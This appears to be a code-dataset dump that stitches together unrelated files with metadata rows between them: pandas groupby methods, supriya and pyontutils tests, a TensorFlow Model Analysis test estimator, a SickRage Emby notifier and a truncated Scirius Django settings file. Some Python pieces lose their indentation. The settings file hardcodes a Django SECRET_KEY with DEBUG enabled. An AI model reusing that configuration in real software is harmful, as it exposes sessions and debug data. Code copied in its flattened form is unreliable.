if not self.as_index:
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
result.index = self.grouper.result_index
if self.axis == 1:
result = result.T
if result.index.equals(self.obj.index):
# Retain e.g. DatetimeIndex/TimedeltaIndex freq
result.index = self.obj.index.copy()
# TODO: Do this more systematically
return self._reindex_output(result)
def _wrap_transformed_output(
self, output: Mapping[base.OutputKey, Series | ArrayLike]
) -> DataFrame:
"""
Wraps the output of DataFrameGroupBy transformations into the expected result.
Parameters
----------
output : Mapping[base.OutputKey, Union[Series, np.ndarray, ExtensionArray]]
Data to wrap.
Returns
-------
DataFrame
"""
indexed_output = {key.position: val for key, val in output.items()}
result = self.obj._constructor(indexed_output)
if self.axis == 1:
result = result.T
result.columns = self.obj.columns
else:
columns = Index(key.label for key in output)
columns.name = self.obj.columns.name
result.columns = columns
result.index = self.obj.index
return result
def _wrap_agged_manager(self, mgr: Manager2D) -> DataFrame:
if not self.as_index:
index = Index(range(mgr.shape[1]))
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
self._insert_inaxis_grouper_inplace(result)
result = result._consolidate()
else:
index = self.grouper.result_index
mgr.set_axis(1, index)
result = self.obj._constructor(mgr)
if self.axis == 1:
result = result.T
return self._reindex_output(result)._convert(datetime=True)
def _iterate_column_groupbys(self, obj: FrameOrSeries):
for i, colname in enumerate(obj.columns):
yield colname, SeriesGroupBy(
obj.iloc[:, i],
selection=colname,
grouper=self.grouper,
exclusions=self.exclusions,
)
def _apply_to_column_groupbys(self, func, obj: FrameOrSeries) -> DataFrame:
from pandas.core.reshape.concat import concat
columns = obj.columns
results = [
func(col_groupby) for _, col_groupby in self._iterate_column_groupbys(obj)
]
if not len(results):
# concat would raise
return DataFrame([], columns=columns, index=self.grouper.result_index)
else:
return concat(results, keys=columns, axis=1)
def count(self) -> DataFrame:
"""
Compute count of group, excluding missing values.
Returns
-------
DataFrame
Count of values within each group.
"""
data = self._get_data_to_aggregate()
ids, _, ngroups = self.grouper.group_info
mask = ids != -1
def hfunc(bvalues: ArrayLike) -> ArrayLike:
# TODO(2DEA): reshape would not be necessary with 2D EAs
if bvalues.ndim == 1:
# EA
masked = mask & ~isna(bvalues).reshape(1, -1)
else:
masked = mask & ~isna(bvalues)
counted = lib.count_level_2d(masked, labels=ids, max_bin=ngroups, axis=1)
return counted
new_mgr = data.grouped_reduce(hfunc)
# If we are grouping on categoricals we want unobserved categories to
# return zero, rather than the default of NaN which the reindexing in
# _wrap_agged_manager() returns. GH 35028
with com.temp_setattr(self, "observed", True):
result = self._wrap_agged_manager(new_mgr)
return self._reindex_output(result, fill_value=0)
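    # Editor's example (not part of the original pandas source; data is
    # illustrative): count reports the number of non-missing values per
    # column within each group.
    #
    #   >>> df = pd.DataFrame({"key": ["a", "a", "b"],
    #   ...                    "val": [1.0, float("nan"), 3.0]})
    #   >>> df.groupby("key").count()
    #        val
    #   key
    #   a      1
    #   b      1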
def nunique(self, dropna: bool = True) -> DataFrame:
"""
Return DataFrame with counts of unique elements in each position.
Parameters
----------
dropna : bool, default True
Don't include NaN in the counts.
Returns
-------
nunique: DataFrame
Examples
--------
>>> df = pd.DataFrame({'id': ['spam', 'egg', 'egg', 'spam',
... 'ham', 'ham'],
... 'value1': [1, 5, 5, 2, 5, 5],
... 'value2': list('abbaxy')})
>>> df
id value1 value2
0 spam 1 a
1 egg 5 b
2 egg 5 b
3 spam 2 a
4 ham 5 x
5 ham 5 y
>>> df.groupby('id').nunique()
value1 value2
id
egg 1 1
ham 1 2
spam 2 1
Check for rows with the same id but conflicting values:
>>> df.groupby('id').filter(lambda g: (g.nunique() > 1).any())
id value1 value2
0 spam 1 a
3 spam 2 a
4 ham 5 x
5 ham 5 y
"""
if self.axis != 0:
# see test_groupby_crash_on_nunique
return self._python_agg_general(lambda sgb: sgb.nunique(dropna))
obj = self._obj_with_exclusions
results = self._apply_to_column_groupbys(
lambda sgb: sgb.nunique(dropna), obj=obj
)
results.columns.names = obj.columns.names # TODO: do at higher level?
if not self.as_index:
results.index = Index(range(len(results)))
self._insert_inaxis_grouper_inplace(results)
return results
@Appender(DataFrame.idxmax.__doc__)
def idxmax(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmax,
"argmax",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
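    # Editor's example (not part of the original pandas source; data is
    # illustrative): for each group, idxmax returns the index label of the
    # maximum of every column.
    #
    #   >>> df = pd.DataFrame({"grp": ["a", "a", "b"], "val": [1, 3, 2]})
    #   >>> df.groupby("grp").idxmax()
    #        val
    #   grp
    #   a      1
    #   b      2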
@Appender(DataFrame.idxmin.__doc__)
def idxmin(self, axis=0, skipna: bool = True):
axis = DataFrame._get_axis_number(axis)
numeric_only = None if axis == 0 else False
def func(df):
# NB: here we use numeric_only=None, in DataFrame it is False GH#38217
res = df._reduce(
nanops.nanargmin,
"argmin",
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
)
indices = res._values
index = df._get_axis(axis)
result = [index[i] if i >= 0 else np.nan for i in indices]
return df._constructor_sliced(result, index=res.index)
return self._python_apply_general(func, self._obj_with_exclusions)
boxplot = boxplot_frame_groupby
|
bsd-3-clause
| -8,992,444,320,100,172,000
| 32.947425
| 88
| 0.548184
| false
| 4.146386
| false
| false
| false
|
Pulgama/supriya
|
tests/test_patterns_Pgpar_Pfx_Pgroup.py
|
1
|
11524
|
import pytest
import uqbar.strings
import supriya.assets.synthdefs
import supriya.nonrealtime
import supriya.patterns
import supriya.synthdefs
import supriya.ugens
with supriya.synthdefs.SynthDefBuilder(in_=0, out=0) as builder:
source = supriya.ugens.In.ar(bus=builder["in_"])
source = supriya.ugens.Limiter.ar(source=source)
supriya.ugens.Out.ar(bus=builder["out"], source=source)
limiter_synthdef = builder.build()
pattern_one = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([1111, 1112, 1113], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([2221, 2222, 2223], 1)
),
]
)
pattern_one = pattern_one.with_group()
pattern_one = pattern_one.with_effect(synthdef=limiter_synthdef)
pattern_two = supriya.patterns.Ppar(
[
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([3331, 3332, 3333], 1)
),
supriya.patterns.Pbind(
duration=1, frequency=supriya.patterns.Pseq([4441, 4442, 4443], 1)
),
]
)
pattern_two = pattern_two.with_group()
pattern_two = pattern_two.with_effect(synthdef=limiter_synthdef)
pattern = supriya.patterns.Pgpar([pattern_one, pattern_two])
pattern = pattern.with_bus()
def test_nonrealtime():
session = supriya.nonrealtime.Session()
with session.at(0):
final_offset = session.inscribe(pattern)
d_recv_commands = pytest.helpers.build_d_recv_commands(
[
supriya.assets.synthdefs.system_link_audio_2,
supriya.assets.synthdefs.default,
limiter_synthdef,
]
)
assert session.to_lists() == [
[
0.0,
[
*d_recv_commands,
["/g_new", 1000, 0, 0],
[
"/s_new",
"38a2c79fc9d58d06e361337163a4e80f",
1001,
3,
1000,
"fade_time",
0.25,
"in_",
16,
],
["/g_new", 1002, 1, 1000],
["/g_new", 1003, 1, 1000],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1004,
1,
1002,
"in_",
16,
"out",
16,
],
["/g_new", 1005, 0, 1002],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1006,
0,
1005,
"frequency",
1111,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1007,
0,
1005,
"frequency",
2221,
"out",
16,
],
[
"/s_new",
"38bda0aee6d0e2d4af72be83c09d9b77",
1008,
1,
1003,
"in_",
16,
"out",
16,
],
["/g_new", 1009, 0, 1003],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1010,
0,
1009,
"frequency",
3331,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1011,
0,
1009,
"frequency",
4441,
"out",
16,
],
],
],
[
1.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1012,
0,
1005,
"frequency",
1112,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1013,
0,
1005,
"frequency",
2222,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1014,
0,
1009,
"frequency",
3332,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1015,
0,
1009,
"frequency",
4442,
"out",
16,
],
["/n_set", 1006, "gate", 0],
["/n_set", 1007, "gate", 0],
["/n_set", 1010, "gate", 0],
["/n_set", 1011, "gate", 0],
],
],
[
2.0,
[
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1016,
0,
1005,
"frequency",
1113,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1017,
0,
1005,
"frequency",
2223,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1018,
0,
1009,
"frequency",
3333,
"out",
16,
],
[
"/s_new",
"da0982184cc8fa54cf9d288a0fe1f6ca",
1019,
0,
1009,
"frequency",
4443,
"out",
16,
],
["/n_set", 1012, "gate", 0],
["/n_set", 1013, "gate", 0],
["/n_set", 1014, "gate", 0],
["/n_set", 1015, "gate", 0],
],
],
[
3.0,
[
["/n_set", 1001, "gate", 0],
["/n_set", 1016, "gate", 0],
["/n_set", 1017, "gate", 0],
["/n_set", 1018, "gate", 0],
["/n_set", 1019, "gate", 0],
],
],
[3.25, [["/n_free", 1000, 1002, 1003, 1004, 1005, 1008, 1009], [0]]],
]
assert final_offset == 3.25
def test_to_strings():
session = supriya.nonrealtime.Session()
with session.at(0):
session.inscribe(pattern)
assert session.to_strings(include_controls=True) == uqbar.strings.normalize(
"""
0.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1007 default
amplitude: 0.1, frequency: 2221.0, gate: 1.0, out: a0, pan: 0.5
1006 default
amplitude: 0.1, frequency: 1111.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1003 group
1009 group
1011 default
amplitude: 0.1, frequency: 4441.0, gate: 1.0, out: a0, pan: 0.5
1010 default
amplitude: 0.1, frequency: 3331.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: a0, out: a0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.25, gate: 1.0, in_: a0, out: 0.0
1.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1013 default
amplitude: 0.1, frequency: 2222.0, gate: 1.0, out: a0, pan: 0.5
1012 default
amplitude: 0.1, frequency: 1112.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1015 default
amplitude: 0.1, frequency: 4442.0, gate: 1.0, out: a0, pan: 0.5
1014 default
amplitude: 0.1, frequency: 3332.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
2.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1017 default
amplitude: 0.1, frequency: 2223.0, gate: 1.0, out: a0, pan: 0.5
1016 default
amplitude: 0.1, frequency: 1113.0, gate: 1.0, out: a0, pan: 0.5
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1019 default
amplitude: 0.1, frequency: 4443.0, gate: 1.0, out: a0, pan: 0.5
1018 default
amplitude: 0.1, frequency: 3333.0, gate: 1.0, out: a0, pan: 0.5
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1001 system_link_audio_2
done_action: 2.0, fade_time: 0.02, gate: 1.0, in_: 16.0, out: 0.0
3.0:
NODE TREE 0 group
1000 group
1002 group
1005 group
1004 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
1003 group
1009 group
1008 38bda0aee6d0e2d4af72be83c09d9b77
in_: 0.0, out: 0.0
3.25:
NODE TREE 0 group
"""
)
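# Editor's note (not part of the original test module): the pattern pipeline
# exercised above composes as
#
#   Ppar([...]) -> .with_group() -> .with_effect(synthdef=limiter_synthdef)
#   -> Pgpar([...]) -> .with_bus()
#
# which is what produces the group / effect-synth / bus structure asserted in
# the node trees and OSC bundles of the two tests.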
|
mit
| -7,873,358,582,196,026,000
| 31.645892
| 95
| 0.342676
| false
| 4.015331
| false
| false
| false
|
tgbugs/pyontutils
|
test/test_oboio.py
|
1
|
6002
|
import os
import shutil
import unittest
import pytest
from pyontutils import obo_io as oio
from .common import temp_path
obo_test_string = """format-version: 1.2
ontology: uberon/core
subsetdef: cumbo "CUMBO"
treat-xrefs-as-has-subclass: EV
import: http://purl.obolibrary.org/obo/uberon/chebi_import.owl
treat-xrefs-as-reverse-genus-differentia: TGMA part_of NCBITaxon:44484
[Term]
id: UBERON:0000003
xref: SCTID:272650008
relationship: in_lateral_side_of UBERON:0000033 {gci_relation="part_of", gci_filler="NCBITaxon:7776", notes="hagfish have median nostril"} ! head
!relationship: in_lateral_side_of UBERON:0000034 {gci_filler="NCBITaxon:7776", gci_relation="part_of", notes="hagfish have median nostril"} ! can't use this due to robot non-determinism
comment: robot does reorder the gci_ so that relation always comes before filler
property_value: external_definition "One of paired external openings of the nasal chamber.[AAO]" xsd:string {date_retrieved="2012-06-20", external_class="AAO:0000311", ontology="AAO", source="AAO:EJS"}
replaced_by: GO:0045202
consider: FMA:67408
[Term]
id: UBERON:0000033
name: head
comment: needed to prevent robot from throwing a null pointer on the relationship axiom above
[Term]
id: UBERON:0000034
[Typedef]
id: in_lateral_side_of
property_value: seeAlso FMA:86003
name: in_lateral_side_of
comment: id needed to prevent robot from throwing a null pointer on the relationship axiom above
comment: apparently also have to have name strangely enough and robot doesn't roundtrip random comments
is_transitive: true
"""
class TMHelper:
parse = oio.TVPair._parse_modifiers
serialize = oio.TVPair._format_trailing_modifiers
class TestOboIo(unittest.TestCase):
@classmethod
def setUpClass(cls):
if temp_path.exists():
shutil.rmtree(temp_path)
temp_path.mkdir()
@classmethod
def tearDownClass(cls):
shutil.rmtree(temp_path)
def test_parse_trailing_modifiers(self):
thm = TMHelper()
lines = (
(('relationship: part_of UBERON:0000949 '
'{source="AAO", source="FMA", source="XAO"} ! endocrine system'),
(('source', 'AAO'), ('source', 'FMA'), ('source', 'XAO'))),
('{oh="look", a="thing!"}', (('oh', 'look'), ('a', 'thing!'))),
('some randome values {oh="look", a="thing!"} ! yay!', (('oh', 'look'), ('a', 'thing!'))),
('some rando}me values {oh="l{ook", a="t{hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't{hing!'))),
('some rando}me values {oh="l{ook", a="t}hing!"} ! yay!', (('oh', 'l{ook'), ('a', 't}hing!'))),
)
bads = [(expect, actual) for line, expect in lines
for _, actual in (thm.parse(line),)
if actual != expect]
assert not bads, '\n' + '\n\n'.join(f'{e}\n{a}' for e, a in bads)
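    # Editor's note (not part of the original tests): TMHelper.parse maps a
    # trailing-modifier block to a tuple of (tag, value) pairs, e.g.
    #   '{source="AAO", source="FMA"}' -> (('source', 'AAO'), ('source', 'FMA'))
    # which is exactly what the table of cases above asserts.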
def test_construct_simple_file(self):
of = oio.OboFile()
ids_names = [['123', 'test'],
['234', 'yee'],
['345', 'haw'],
['456', 'oio']]
terms = [oio.Term(id=i, name=n) for i, n in ids_names]
of.add(*terms)
str(of)
def test_header_treat_xrefs(self):
of = oio.OboFile()
test_tag = 'treat-xrefs-as-is_a'
tags_values = [
[test_tag, 'TEMP:test1'],
[test_tag, 'TEMP:test2'],
]
tvpairs = [oio.TVPair(tag=t, value=v) for t, v in tags_values]
of.header.add(*tvpairs)
tv = of.asObo()
assert len(tv.split(test_tag)) > 2, tv
def test_property_value_bug(self):
def _test(string):
pv = oio.Property_value.parse(string)
assert pv.value() == string
tv = oio.TVPair(string)
assert str(tv) == string
return pv, tv
minimal = ('property_value: any " ! " xsd:string')
pv, tv = _test(minimal)
darn = ('property_value: external_ontology_notes "see also MA:0002165 !'
' lieno-pancreatic vein" xsd:string {external_ontology="MA"}')
pv, tv = _test(darn)
ouch = ('property_value: editor_note "TODO -'
' this string breaks the parser A:0 ! wat" xsd:string')
pv, tv = _test(ouch)
hrm = ('property_value: editor_note "TODO -'
' consider relationship to UBERON:0000091 ! bilaminar disc" xsd:string')
pv, tv = _test(hrm)
def test_robot(self):
of1 = oio.OboFile(data=obo_test_string)
obo1 = of1.asObo(stamp=False)
obor1 = of1.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of2 = oio.OboFile(data=obo1)
obo2 = of2.asObo(stamp=False)
# can't test against obor2 because obo1 reordered the trailing qualifiers
# and since there is seemingly no rational way to predict those, we simply
# preserve the ordering that we got
obor2 = of2.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
of3 = oio.OboFile(data=obor1)
obo3 = of3.asObo(stamp=False)
obor3 = of3.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
print(obo1)
print(obo2)
print(obor1)
print(obor2)
assert obo1 == obo2 == obo3 != obor1
assert obor1 == obor3
@pytest.mark.skipif(not shutil.which('robot'), reason='robot not installed')
def test_robot_rt(self):
of = oio.OboFile(data=obo_test_string)
obor1 = of.asObo(stamp=False, version=oio.OBO_VER_ROBOT)
rtp = temp_path / 'robot-test.obo'
robot_path = temp_path / 'robot-test.test.obo'
of.write(rtp, stamp=False, version=oio.OBO_VER_ROBOT)
cmd = f'robot convert -vvv -i {rtp.as_posix()} -o {robot_path.as_posix()}'
wat = os.system(cmd)
if wat:
raise ValueError(wat)
datas = []
for path in (rtp, robot_path):
with open(path, 'rt') as f:
datas.append(f.read())
ours, rob = datas
assert ours == rob
|
mit
| -6,232,890,414,575,821,000
| 34.72619
| 201
| 0.598967
| false
| 3.077949
| true
| false
| false
|
tensorflow/model-analysis
|
tensorflow_model_analysis/eval_saved_model/example_trainers/control_dependency_estimator.py
|
1
|
6700
|
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exports a simple estimator with control dependencies using tf.Learn.
This is the fixed prediction estimator with extra fields, but it creates
metrics with control dependencies on the features, predictions and labels.
This is for use in tests to verify that TFMA correctly works around the
TensorFlow issue #17568.
This model always predicts the value of the "prediction" feature.
The eval_input_receiver_fn also parses the "fixed_float", "fixed_string",
"fixed_int", and "var_float", "var_string", "var_int" features.
"""
from __future__ import absolute_import
from __future__ import division
# Standard __future__ imports
from __future__ import print_function
# Standard Imports
import tensorflow as tf
from tensorflow_model_analysis.eval_saved_model import export
from tensorflow_model_analysis.eval_saved_model.example_trainers import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.estimator.canned import prediction_keys
def simple_control_dependency_estimator(export_path, eval_export_path):
"""Exports a simple estimator with control dependencies."""
def control_dependency_metric(increment, target):
"""Metric that introduces a control dependency on target.
The value is incremented by increment each time the metric is called
(so the value can vary depending on how things are batched). This is mainly
to verify that the metric was called.
Args:
increment: Amount to increment the value by each time the metric is
called.
target: Tensor to introduce the control dependency on.
Returns:
value_op, update_op for the metric.
"""
total_value = tf.compat.v1.Variable(
initial_value=0.0,
dtype=tf.float64,
trainable=False,
collections=[
tf.compat.v1.GraphKeys.METRIC_VARIABLES,
tf.compat.v1.GraphKeys.LOCAL_VARIABLES
],
validate_shape=True)
with tf.control_dependencies([target]):
update_op = tf.identity(tf.compat.v1.assign_add(total_value, increment))
value_op = tf.identity(total_value)
return value_op, update_op
def model_fn(features, labels, mode, config):
"""Model function for custom estimator."""
del config
predictions = features['prediction']
predictions_dict = {
prediction_keys.PredictionKeys.PREDICTIONS: predictions,
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions_dict,
export_outputs={
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY:
tf.estimator.export.RegressionOutput(predictions)
})
loss = tf.compat.v1.losses.mean_squared_error(predictions,
labels['actual_label'])
train_op = tf.compat.v1.assign_add(tf.compat.v1.train.get_global_step(), 1)
eval_metric_ops = {}
if mode == tf.estimator.ModeKeys.EVAL:
eval_metric_ops = {
metric_keys.MetricKeys.LOSS_MEAN:
tf.compat.v1.metrics.mean(loss),
'control_dependency_on_fixed_float':
control_dependency_metric(1.0, features['fixed_float']),
# Introduce a direct dependency on the values Tensor. If we
# introduce another intervening op like sparse_tensor_to_dense then
# regardless of whether TFMA correctly wrap SparseTensors we will not
# encounter the TF bug.
'control_dependency_on_var_float':
control_dependency_metric(10.0, features['var_float'].values),
'control_dependency_on_actual_label':
control_dependency_metric(100.0, labels['actual_label']),
'control_dependency_on_var_int_label':
control_dependency_metric(1000.0, labels['var_int'].values),
# Note that TFMA does *not* wrap predictions, so in most cases
# if there's a control dependency on predictions they will be
# recomputed.
'control_dependency_on_prediction':
control_dependency_metric(10000.0, predictions),
}
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
predictions=predictions_dict,
eval_metric_ops=eval_metric_ops)
def train_input_fn():
"""Train input function."""
return {
'prediction': tf.constant([[1.0], [2.0], [3.0], [4.0]]),
}, {
'actual_label': tf.constant([[1.0], [2.0], [3.0], [4.0]])
}
feature_spec = {'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32)}
eval_feature_spec = {
'prediction': tf.io.FixedLenFeature([1], dtype=tf.float32),
'label': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_float': tf.io.FixedLenFeature([1], dtype=tf.float32),
'fixed_string': tf.io.FixedLenFeature([1], dtype=tf.string),
'fixed_int': tf.io.FixedLenFeature([1], dtype=tf.int64),
'var_float': tf.io.VarLenFeature(dtype=tf.float32),
'var_string': tf.io.VarLenFeature(dtype=tf.string),
'var_int': tf.io.VarLenFeature(dtype=tf.int64),
}
estimator = tf.estimator.Estimator(model_fn=model_fn)
estimator.train(input_fn=train_input_fn, steps=1)
def eval_input_receiver_fn():
"""An input_fn that expects a serialized tf.Example."""
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
features = tf.io.parse_example(
serialized=serialized_tf_example, features=eval_feature_spec)
labels = {'actual_label': features['label'], 'var_int': features['var_int']}
return export.EvalInputReceiver(
features=features,
labels=labels,
receiver_tensors={'examples': serialized_tf_example})
return util.export_model_and_eval_model(
estimator=estimator,
serving_input_receiver_fn=(
tf.estimator.export.build_parsing_serving_input_receiver_fn(
feature_spec)),
eval_input_receiver_fn=eval_input_receiver_fn,
export_path=export_path,
eval_export_path=eval_export_path)
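# Editor's sketch (not part of the original module; the paths below are
# placeholders): the exporter above is typically driven as
#
#   simple_control_dependency_estimator(
#       export_path="/tmp/control_dep/serving",
#       eval_export_path="/tmp/control_dep/eval")
#
# which trains the estimator for a single step and exports both a serving
# model and a TFMA eval model via util.export_model_and_eval_model.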
|
apache-2.0
| -6,121,643,079,959,225,000
| 38.64497
| 80
| 0.673134
| false
| 3.893085
| false
| false
| false
|
pedro2d10/SickRage-FR
|
sickbeard/notifiers/emby.py
|
1
|
4193
|
# coding=utf-8
# Author: Nic Wolfe <nic@wolfeden.ca>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import urllib
import urllib2
import sickbeard
from sickbeard import logger
from sickrage.helper.exceptions import ex
try:
import json
except ImportError:
import simplejson as json
class Notifier(object):
def _notify_emby(self, message, host=None, emby_apikey=None):
"""Handles notifying Emby host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
# fill in omitted parameters
if not host:
host = sickbeard.EMBY_HOST
if not emby_apikey:
emby_apikey = sickbeard.EMBY_APIKEY
url = 'http://%s/emby/Notifications/Admin' % host
values = {'Name': 'SickRage', 'Description': message, 'ImageUrl': 'https://raw.githubusercontent.com/SickRage/SickRage/master/gui/slick/images/sickrage-shark-mascot.png'}
data = json.dumps(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', emby_apikey)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
##############################################################################
# Public functions
##############################################################################
def test_notify(self, host, emby_apikey):
return self._notify_emby('This is a test notification from SickRage', host, emby_apikey)
def update_library(self, show=None):
"""Handles updating the Emby Media Server host via HTTP API
Returns:
Returns True for no issue or False if there was an error
"""
if sickbeard.USE_EMBY:
if not sickbeard.EMBY_HOST:
logger.log(u'EMBY: No host specified, check your settings', logger.DEBUG)
return False
if show:
if show.indexer == 1:
provider = 'tvdb'
elif show.indexer == 2:
logger.log(u'EMBY: TVRage Provider no longer valid', logger.WARNING)
return False
else:
logger.log(u'EMBY: Provider unknown', logger.WARNING)
return False
query = '?%sid=%s' % (provider, show.indexerid)
else:
query = ''
url = 'http://%s/emby/Library/Series/Updated%s' % (sickbeard.EMBY_HOST, query)
values = {}
data = urllib.urlencode(values)
try:
req = urllib2.Request(url, data)
req.add_header('X-MediaBrowser-Token', sickbeard.EMBY_APIKEY)
response = urllib2.urlopen(req)
result = response.read()
response.close()
logger.log(u'EMBY: HTTP response: ' + result.replace('\n', ''), logger.DEBUG)
return True
except (urllib2.URLError, IOError) as e:
logger.log(u'EMBY: Warning: Couldn\'t contact Emby at ' + url + ' ' + ex(e), logger.WARNING)
return False
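# Editor's sketch (not part of the original module; host and API key are
# placeholders): typical use of this notifier is
#
#   notifier = Notifier()
#   notifier.test_notify('192.168.1.10:8096', 'EMBY_API_KEY')
#   notifier.update_library(show)  # show: any object with .indexer/.indexerid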
|
gpl-3.0
| -1,720,672,605,901,913,900
| 33.652893
| 178
| 0.576198
| false
| 4.151485
| false
| false
| false
|
CyberTaoFlow/scirius
|
scirius/settings.py
|
1
|
4444
|
"""
Django settings for scirius project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from distutils.version import LooseVersion
from django import get_version
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'p8o5%vq))8h2li08c%k3id(wwo*u(^dbdmx2tv#t(tb2pr9@n-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_tables2',
'bootstrap3',
'rules',
'suricata',
'accounts',
)
if LooseVersion(get_version()) < LooseVersion('1.7'):
INSTALLED_APPS += ('south', )
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'scirius.loginrequired.LoginRequiredMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth'
)
ROOT_URLCONF = 'scirius.urls'
WSGI_APPLICATION = 'scirius.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
# Suricata binary
SURICATA_BINARY = "suricata"
# Elastic search
